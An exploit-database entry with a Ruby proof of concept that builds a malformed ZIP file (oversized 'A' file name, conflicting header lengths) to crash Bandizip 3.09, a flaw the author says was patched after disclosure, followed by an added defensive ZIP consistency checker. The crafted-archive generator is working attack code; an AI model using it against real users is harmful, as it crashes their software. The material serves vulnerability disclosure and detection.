Bandizip 3.09 Crash Proof Of Concept

EKU-ID: 3804 CVE: OSVDB-ID:
Author: Osanda Malith Published: 2014-02-11 Verified: Verified

#!/usr/bin/env ruby
# Exploit Title: Bandizip 3.09 .zip Crash POC
# Date: February 6th 2014
# Author: Osanda Malith Jayathissa
# E-Mail: osandajayathissa<at>gmail.com
# Version: 3.09 32-bit and 64-bit (earlier versions might be affected)
# Vendor Homepage: http://www.bandisoft.com/
# Tested on: Windows XP 32-bit SP2 en, Windows 8 64-bit
# This issue is patched in Bandizip 3.10 after a responsible disclosure
# Open this crafted file and double-click on it in the app itself

=begin
eax=00000000 ebx=0374fad0 ecx=00000000 edx=00000000 esi=0374fa54 edi=00000000
eip=770be1a4 esp=0374f92c ebp=0374faac iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
ntdll!ZwWaitForMultipleObjects+0xc:
770be1a4 c21400          ret     14h
=end

# Local file header (30 bytes): signature, version 2.0, no flags, stored (method 0),
# DOS time/date, then zeroed CRC and sizes
lf_header =  "\x50\x4B\x03\x04\x14\x00\x00"
lf_header += "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
lf_header += "\x00\x00\x00\x00\x00\x00\x00\x00"
lf_header += "\xe4\x0f" # file-name length 0x0fe4 = 4068 (labelled "file size" in the original);
                        # the header is one byte short before this field, so a strict parser
                        # reads the local name length from the next two bytes as 15 while the
                        # central directory entry below declares 4068
lf_header += "\x00\x00\x00"

# Central directory file header (46 bytes) for the single entry
cdf_header =  "\x50\x4B\x01\x02\x14\x00\x14"
cdf_header += "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
cdf_header += "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
cdf_header += "\xe4\x0f" # file-name length 0x0fe4 = 4068 (the payload length)
cdf_header += "\x00\x00\x00\x00\x00\x00\x01\x00" # extra/comment lengths, disk number, internal attributes
cdf_header += "\x24\x00\x00\x00\x00\x00\x00\x00" # external attributes, offset of local header (0)

# End of central directory record (22 bytes): one entry on one disk
eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
eofcdf_header += "\x12\x10\x00\x00" # size of central directory: 0x1012 = 4114 = 46 + 4068
eofcdf_header += "\x02\x10\x00\x00" # offset of start of central directory: 0x1002 = 4098 = 30 + 4068
eofcdf_header += "\x00\x00" # comment length

# Payload: a 4068-byte (0x0fe4) file name of 'A's ending in ".txt"
payload = "A" * 4064
payload += ".txt"

exploit = lf_header + payload + cdf_header + payload + eofcdf_header

# Write in binary mode so newline translation on Windows cannot alter any byte
File.open('bandizip.zip', 'wb') { |f| f.write(exploit) }
#EOF
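As an added defender-side example (not part of the author's PoC), the following Ruby cross-checks a ZIP file's central directory against its local file headers, the two structures the script above hand-builds. Run over the bandizip.zip it writes, the checker reports the over-long file name and the name-length disagreement between the local header and the central directory entry; `check_zip` and `build_stored_zip` are hypothetical helper names, and the archive the second one builds is constructed test input.

```ruby
require "zlib"
LFH_SIG  = "PK\x03\x04".b   # local file header
CDH_SIG  = "PK\x01\x02".b   # central directory file header
EOCD_SIG = "PK\x05\x06".b   # end of central directory record

# Walk the central directory and cross-check every entry against the local file
# header it points at. Returns an array of findings; an empty array means consistent.
def check_zip(data)
  data = data.b
  findings = []
  eocd = data.rindex(EOCD_SIG)
  return ["no complete end-of-central-directory record"] unless eocd && data.bytesize >= eocd + 22
  entries, cd_size, cd_off = data[eocd + 10, 10].unpack("vVV")
  findings << "central directory (#{cd_off}+#{cd_size}) overruns the EOCD record at #{eocd}" if cd_off + cd_size > eocd
  pos = cd_off
  entries.times do |i|
    if pos + 46 > data.bytesize || data[pos, 4] != CDH_SIG
      findings << "entry #{i}: no central directory header at offset #{pos}"
      break
    end
    cd_nlen, cd_xlen, cd_clen = data[pos + 28, 6].unpack("vvv")
    lfh_off = data[pos + 42, 4].unpack1("V")
    cd_name = data[pos + 46, cd_nlen]
    # Heuristic: no legitimate entry needs a name longer than Windows MAX_PATH (260).
    findings << "entry #{i}: #{cd_nlen}-byte file name (longer than 260)" if cd_nlen > 260
    if data.bytesize < lfh_off + 30 || data[lfh_off, 4] != LFH_SIG
      findings << "entry #{i}: no local file header at offset #{lfh_off}"
    else
      lf_nlen = data[lfh_off + 26, 2].unpack1("v")
      if lf_nlen != cd_nlen
        findings << "entry #{i}: name length mismatch (local header #{lf_nlen}, central directory #{cd_nlen})"
      elsif data[lfh_off + 30, lf_nlen] != cd_name
        findings << "entry #{i}: file name differs between local header and central directory"
      end
    end
    pos += 46 + cd_nlen + cd_xlen + cd_clen
  end
  findings
end

# Constructed test input: a minimal single-entry "stored" archive (hypothetical helper).
def build_stored_zip(name, content)
  name, content = name.b, content.b
  crc = Zlib.crc32(content)
  lfh  = LFH_SIG + [20, 0, 0, 0, 0, crc, content.bytesize, content.bytesize, name.bytesize, 0].pack("vvvvvVVVvv") + name
  cdh  = CDH_SIG + [20, 20, 0, 0, 0, 0, crc, content.bytesize, content.bytesize, name.bytesize, 0, 0, 0, 0, 0, 0].pack("vvvvvvVVVvvvvvVV") + name
  eocd = EOCD_SIG + [0, 0, 1, 1, cdh.bytesize, lfh.bytesize + content.bytesize, 0].pack("vvvvVVv")
  lfh + content + cdh + eocd
end
```

To inspect a file on disk, pass `File.binread(path)` to `check_zip`; the findings are plain strings suitable for logging from a mail or upload gateway.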